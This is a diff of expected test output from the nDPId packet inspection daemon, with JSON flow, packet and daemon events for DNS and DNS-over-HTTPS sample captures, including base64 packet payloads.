00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -144,7 +144,7 @@
00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":66,"packets-processed":59,"total-skipped-flows":0,"total-l4-data-len":17861,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":148,"global_ts_msec":1560869916477}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 66/59

480
test/results/dnscrypt-v2-doh.pcap.out
View File

@@ -1,245 +1,245 @@
00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946739298533}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946739298533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739298533,"pkt":"REREREREZmZmZmZmCABFAAFD4UdAAL0GsQQKAAABi2PeSNGqAbt5f9qX6vvArlAYAfYrngAAFgMBARYBAAESAwPY4R+kmwrmRkwkOvmL20MZvvmmXV\/QYaA6X4C5e+GFvyA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACA0hS9OEA\/J5twwMByNtSlpgrCPJW9Ooqwd+S9NxEdaCw=="}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946739298797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAWq1TBAACsGSrWLY95ICgAAAQG70arq+8CueX\/bslAQAfmvXQAAFgMDAHoCAAB2AwOWvrm4FPC7V7PYuN+Lshod\/nezEzfqc01CK\/K8f2FrjCA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WRMBAAAuACsAAgMEADMAJAAdACDl61zVHhMWB0BdL3ddlBFKSw5Lr9HVe6EkVLOcYVLAAxQDAwABARcDAwAksgraFQq8T84jfrRmYc223NGnVGbYG\/xj8xk4v\/EJCHm3s9w1FwMDCVmg97DgSdnn53nb0jGLv9F1+4VVO1DlJvFZ4CsfAqRyJ8a0jMqAaeRjhyCNwiDpU+6mevWKgpxWfYNjWShazkI7oaAh0ocoGs0\/Z2Mwn5ZIkIv+OuDwieAM9qTwhi+fGVM4H+qU8v3e8TtrqoxC+IgZVc8V3I+\/yPEjroPH33YYxxjju5aqvElJCjEI4urJQzXoWsAq6uQKccy5WfzKSDhJNZ8AVPquU8SpWKmo\/\/E2qD+dKLWJFgaub29gXMXjQTVzoJxdvVKG52mcWm6EXETLAVeqYVAn1jxtrmpkg13Vk85sRN2hjK5eeu4ap8rf7Lodf5tfmhv8SVfULmdGCNmmvgZMJkjmNfdKrw+XnrBHNQP2GC7kgKzhx++y9Ur+7CtcaZ0Stuv2mMWKbTn30OOZzAWiYjVeWw1PNj6IPMesZYC3bO1PwS8+BOlQEPumskRErqRklUuVJ1OXsXJn8o9P7B9r5RxumsKPZbrYuGjTJfVUwTIwaAH4g\/GODGK2+B5YB\/Z\/6LysjXxF0obthFSDlDUGBTCdDZdGFQyyl8u0xri2sr4xv5TWFpIjmyYys6SXqhW7QRXi8cM\/fGE\/JM+qZpyddar8bHdCLxGlvvPz4eCxh6lg0sugzb6K+mUo6W7gtEoQaKMIAakeMy2FOKQ3NMe5\/F+3b43gHog099YK8NKs2bvSG\/W7LXyo8PnUinj+AVLnzhrSe+qvDBw9a\/Jp7AkHbVoQwt\/EIF5\/d5w+4KMlJPMSzCUov8rfi\/CCF\/iVjvModtxk+gLz4pUaK3XRZHYtLxfH7FHcLizTZ3sSU4i+tweqvPEyxXE1E7Y+KMLDCV+QkbWkWi9gMec8ZJ3GBnIg+iSrehGCt8i8t7Lu9Wc\/2fGKgQfE9jJe\/fDA2odknuy5GV2960tQvEZAXB0c5GJBhjiPYJgYdgJ2fzUt\/xLgBoWg0zKHa\/soHWqBrLympLp+VepVMyzuzIJ6QgGVTCC1EFSrrSUxkNXDsBrwmyRP\/9FLF9pdzZACXTb6S8myrZazmvEdGdk04PjNhUiHGlUT03OYvmagf8Ya\/4VRzGGdV43OAGkQYeu0ZY\/heh9h7fucuCFB8CyBx4wy7OhYHBnDOYz2gdf\/z49N039rzJarMWXOwbROgeoXzcsBH8Uj6StZMCbM\/ZBGWByfEjHDl5w8E1dbyJx5XuC65RezHZrv05dJlBbVSEsHIMbDl7IWOUdhpeDNskZrQ+GdU5boLCtHmvrbs62KT\/zlJm2mOApHTvifRvmqKBz9tPtGNCG6XGCZWhEY3FFyS9rmcTpceJwTCfQYlzYKZslhMKd4J63ankp0RnGQLgodwM35ISK98+Kq2hNOJCTBOCxPPsHuXjZuhXdIi8QCW9VQZqww\/\/NjZPMOPy4jcZ7Tkixh7\/JmbpMEV7PnrhAXh21z+u5dLFH52pKdwGRat6A94UDcInit5rOcJtblnF8P7F8IlQqF3WFZurZBuXzllHTzbwe54UUGPwrqwyOIUkW6zUYU\/09YfhXdyYwY1MnGRAlrE9sPr4V9Vgn7ZntvhQgmKz\/jiHNHuRGaj\/PJAjEPTmoQib9SfYaA5fyYDQmsautNL\/cJ4oyfD9Jembyctib1BIp9Ramfe6PSsBXI\/0Ka52Or"}
00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946739298797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAVy1TFAACsGSuyLY95ICgAAAQG70arq+8YweX\/bslAYAfkcrQAAThemFBuD34j0ZojpR7nDk08tEILyrSrE7HS0zZ4kmhXJJxPvCajO9mPz0f1Ba7CUeJZuC\/ww3Lrn+zD28CW1o9VT3LiWNj\/tk7IhVjR3oxyzXVyp8GIUKoCq+rFgLmVNv3t4E9NSsp0vzaP0F7j0JBrlPSojRxE2tlZsJ5feSSYzKGVucsWX6pYRquGlpuPfdHODx0L8ifTKNZ7sMGSXufTYU71W7zucIJWTJn92oiP3KQmXtYYb39SlVhRkoPmox0CcWIbUIkPk1mOfiZj7ZHZGdjmSkO+stoE+mAIy1qeh6xhTg7nyjAGvTt0OEbSBbL64py0gHtL8p9MnYDH\/rEu94PzROteC\/nq08LwZZof+0aydUgoyNJpYIzziL6obgZ8r3XFfT2yBZeGRYlK+7j980Fzg4IJlxXjB\/7u4t3CFM2KzwkVTOl0QgQ2WdVMZr63UzYIuBqVeqhjDwph8EAIPfj6GHii36awX1ARUIn+i2we8pqEICyjrrtz5abqrvBqhOgUymt9799jpjN96PN89rSa+qz8R5hSWva8Z0q12NMSUqK4V32q2T+XbFuVZUlGqNPo8Q4LGFZXuYD0rXuNudeUYIvyeE2j5uqdZqZHCJg4amyAZz0RTts0c1\/NYqX2y5hPaOLvInAlZn4kgRx8P3JUIFzzVPNJJ35uuAChT5mattKXxu8qwume7sBZMgcO4xIk9V0GeDf7Q0iqbxG1cZybv7JIhiCiaIbji819I0oDOejGbK2XffVEsRj3+LURpVM8fUmFAk669Ff\/Nr+yt6tH9Ktz6qOevm0rhgviDIUwzLNJNTxk3pvt9wNVus\/LUfcLiMKspToabUtDV2KtFlgjUQBZ6M603sQeMbcyD6v4zye6TReEZisbYDNmcge+IFl+e+6gIZYcwnBnjL+IMuKODuiRDaCLQJS72LiQoTClqyWNhk8p3nZX4LJsLVi6dW6cV7ErhFynQJtxWGrvo9DrmvbJGRV80Ul449jTrc22WvgTBKnaXTTsv2pw69IL3ziatAlwA6VUKivZyuSnP\/qeqQsLIM3h1xsud7x+raSQILbisV46QaEMOKNMhEo4f9EE5vYtzwm\/ngKP6CEyyxa5eOnqoj72FpXRNgDKcpbuNQSddL+rkopq\/y8uRR5TATut5xq9zEjEQLnRu3bhaqmLH7wPAre5tejGNaBElH9ZorCCzrnrfL+5ZFV65djnMn\/burxQW9SIIOlDcRe3ddZxIf\/z8dXGWfc\/YJ2alVKWABNBLcFPeFubCnDOGFnp7WaEezUQCo1huX1d\/AR2t9ZFIxb+\/2YA0Fcu4FFOucBmHB64h34YnG1QktWj0QN6yNlW1E24ubX3xPextdjh4av9ufsqLyV+lQC34GqCFKa3D2btbNVuYlf3F\/nsdPHHCRn+svJvZKssoO39MnIg20E8\/NZSYgAW7+dMxM2JbTCDpQf718V5e42Tcc3D\/MVuwLpSLFUnGgbahF3PvczhUvo5QFk5tF0YRiH+1QJX+P4Bld+SLzREBNKhff3\/yg9uJJKca+U+6nBcDAwCBaMxAcfS4h68NX8O4\/JsJCa+QWF87yNO9r0+szCZ1TeWGW\/KMvQNFzX1G+Y2PEnQ68hI4LpJQIC4VjBdW13rCggF8QR46NY3HL4enM7oteZTlqkQvxVphVmRyDsYFcjY4u2fGUw5LFrsQktQhx2VsQTygsXipX2KtdmPdscHLlgGRFwMDADV5C7WBlZ+ocDTA\/zppOjhaktsCXwO0sG+1hu0Zi0K+GaWwxXTJGdG0p2vdDlGf4dOI0eNxTQ=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946739299058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739299058,"pkt":"REREREREZmZmZmZmCABFAAFDIvZAAL0Gb1YKAAABi2PeSNGsAbu+7R6jIfk4pVAYAfYrngAAFgMBARYBAAESAwOSQ8JxHhGuu6wLKnGtwDfaCU9fn2zkXyLvCqG6Z1EJrSA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBvduxHcveHyzSwUHe1UMoR3WO30Q1YJASO6Gqd5f5rOQ=="}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946739299325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAWq+oRAACsGJWGLY95ICgAAAQG70awh+Tilvu0fvlAQAflBFAAAFgMDAHoCAAB2AwO4E1L4A\/\/vaa3qFy7zGtkSllYVpFARFReL8E9wQ5edfiA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62BMBAAAuACsAAgMEADMAJAAdACC6hi7aKoaulrg0kHVy9iX3JtIXsjOWFqMY4JtXoR3ZFBQDAwABARcDAwAkVn7ui3VtyEjBPho8csX4cWU91LDHlldd37yMDuMkm1WrNSA\/FwMDCVkNxERPpxFp1hU3MTygH94nI+uO3MFA6Pgc7Cjgsqv9R94L1LzqnlTJ9qM2GdC3DoaCFMZy2rvnd3TUb44js1wH\/ZjR\/tueYjuCchsydXsjOJIItHXpv6rNdoQc5GxilmSN3ZLV0BdssW6zhxxgQaE3FYajxWXTTfgzUzOS+6W++jmvd1q00zg+8Q0qSguzfNUtyikLzjXqF591w71tmw1RwueDWDRqOR8D9ArOOASC\/gfHKocbf3MYoPn\/L3+LeyjDo7Dan2mPuEUKlItjagedNzassvjfnCKDfWzjTYX1Oj074zzZKYUi326SCBVqvZ4BTAJFklyVRE2\/7w5a9Hu3TkucSU4uD6YDgHvYuwr1PUeuJlpLcTtMIe6KqdQO6VhykmmEfKtsuoqKDau0V16KSQWM2aCvsVesKQ3DSQJg5rL5yIwj9vpyWnaHxDEgfEIDmYjy\/Axgsm7vfVWFF3Jrfc1xzCpgVx2Wzxxl\/maZOzNTYwZUTU3hLDZjHHXTyifvb45snBjXrLw3E9kNt6T2lmZ7d2lzBq35OqiFyiqDdqg5nN+wvKg6FFTseFXwn\/Cnava4JqwJeCYBLZwtvjbxpmY\/Z7bzc6mZPg2Sh+dbDSkCl3bi0C7OGN4lTKk6SakWyrfvl60M9dBFHVDrzgKu7xbDvPEvSNcZq2Dx1QXy2oMyLZnD977uZ9nLe2MaP79hLJNgy4v+jriXtA5fuVRTABndd0eLGpCNoQRcyQEasclWVE0X3djEYjD5W2s+8ID+COBoWOoyP\/WAq9bDmdFuLbZL5YcQMg6OEX37+6VcGXh24mzLjiWqRW2SXZBECP5e9Kp+qBc4nsLJy+\/cCFFzWnnOIeDNkPzITjeYYG62LLpDcjihxenHjNkU8aI6W9z7HJRAKXj15JybI7ZavgKdsyBJSz8Rv17E9WgwJgE24FqtNa6LcXPjCIVJ4JA\/FRIvlJbq2\/PV2grzaPllz7EIQXESn4AAbsSK6v\/afg1rifhsSGv2yYjxwtRB5P9D+FT0dFjO2m9zDYEYLvFPNAv2\/uEF0d+ML9zrDfaDdz6z+wzZI7tOXb+ZgoELySqXWnZpXCKfAbAaRdkBWG9n\/7DEkPQfGc3BRuxecF3gZRN5TjRNnS3L\/z3Mjd0kgq5NvuPBzwr++r8PkzDyv4SrhrEho0ZXiTGQlO7AUNavDHJ2E6WcvB6wH6w+nDu+LafkJwVBrA3g2ry2AgWQYQlCtuH3p4tS5epl0vy3sOsnzjbAIulHq4VIitq5pO3s+sczN2QL3hoGMgZmvfNYCCppei2sMRM3JeTXdDamDavAss5ffhc7o9sFzFOhYwBHF3K+RDvF+\/0hY+kvloFXPT7w5qyKb029c\/+Vu3kK8iCqQMpkd\/Y7fPVoDJRSebia6NkOtp0QF10Wqdh2s0768F9ux8l3ns6Ahcvm\/CEcnhylTvqF1H8nFLoIPnLNfkqliriwfEB7qB8aB8psWMvXozj1u+xw79vKaBVDClx5kPg1ndY1UZCkXuVmLOZwvxWWc0tuTJcMVug1lNwCPKGUEoQ6IRWLIe8NCbqmkI6bW\/5Xu20soyB9iTbKgsh2xLBekpYgVl8gT8VGJflOjydyD64I9+T\/dXz5zy\/0oPQP9q2vSa5j"}
00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946739299325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1406,"pkt_l4_len":1372,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAVw+oVAACsGJZqLY95ICgAAAQG70awh+T4nvu0fvlAYAfmmIAAAiW51QuqEfobYElojzNdmal3NmvuNd\/aotOFuZKIcd+01MY62EHH7E56\/oxK0qr9J58d7Jfc491vr3AkBsKJZSE5EN1LMlpXioNrse464nnbj5nYCt1y8iJtaYVHfHT9x8ujbG\/T2N6ZekRm+ONP3O7xw3rubgw7ubQJF\/KHEiRVFPrbIwq5RI7VTRdfrd3b9Fc\/71kitl8ImBckYsh09FSa2nRQrqALNG43BNA+FPS+D4bALfGJGztFq32s2D2cWRj2vno7VjQQWYQsz+9R40cUHWMbbW0anf7aLopYHYwhAUnxfUJyLSGv\/hcuY1JoGSes4gPPm0w\/KvSPUfmH1XOcuJRdoXdElY5F\/m9je9IUq8euoPyf0PXU\/w6wn+q9PJNYNblwNWPVkVSF6bp87Ycrz+bZvhmrk3ipYYu58\/qf3ItMXsHiYNDHVbyhTOrrT84X2uXkA5ajgilxkHZCWJdDIvRFwT++59P5vI4krRFU0SPX1eygQdMslXLsxvfqQATVp3sK76bt8qHa8rMRVLCfPA3UPe8Z9q\/JNBVvEPCwFBWQICqqCApD7kqMSclaEy89K83LVugXlNfNOargw6YlUR36QNrsco2xSkkpbYZSag+guZDt8NaBOAQqx6Dtx5yS9ZeM2TaZ4Tva3cH5WwTw3nwMfyBrZkmKclliFlyL+l3\/Ft\/1cAhtU5U7a4LgYVbdqsQxRVbeUPAwUZ68y2BGyj5Xg8Mtci4mPsgh+bnyNL5K5y9jSltRS79PDJA87B7hqXTRUrELkxjFWaMPAzghsENt\/UjelVjAgSWUxzpqxPV+2hED3HVp9LJOBmZIcSEVN1eWHazkX+mtW2m+0GAsZaxamutLzgJh\/DRJa7Jw23fjV9PCXnj9MWSdJstPENtBI0OVh7PH0+uAGt1zxMdGzUgBU2QlNOO7S4UuYD0Y26DtfRFNsa3yyMMJM